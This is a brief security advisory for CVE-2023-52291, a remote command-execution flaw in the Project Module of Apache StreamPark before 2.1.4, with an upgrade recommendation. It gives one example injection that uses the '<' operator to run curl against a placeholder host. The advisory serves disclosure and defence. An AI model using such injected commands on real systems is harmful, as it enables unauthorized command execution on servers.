CVE-2023-52291

Name of the Vulnerable Software and Affected Versions Apache StreamPark versions prior to 2.1.4

Description The issue is related to incorrect handling of the < element in the Project Module of Apache StreamPark, allowing for remote command execution. The vulnerability can be exploited by inserting commands, such as using the < operator to execute arbitrary commands, for example, < (curl http://xxx.com ). The risk level of this vulnerability is considered low, as it requires the attacker to have system-level permissions and log in to the StreamPark system.

Recommendations For versions prior to 2.1.4, upgrade to version 2.1.4 to resolve the issue, as the < operator will be blocked in this version.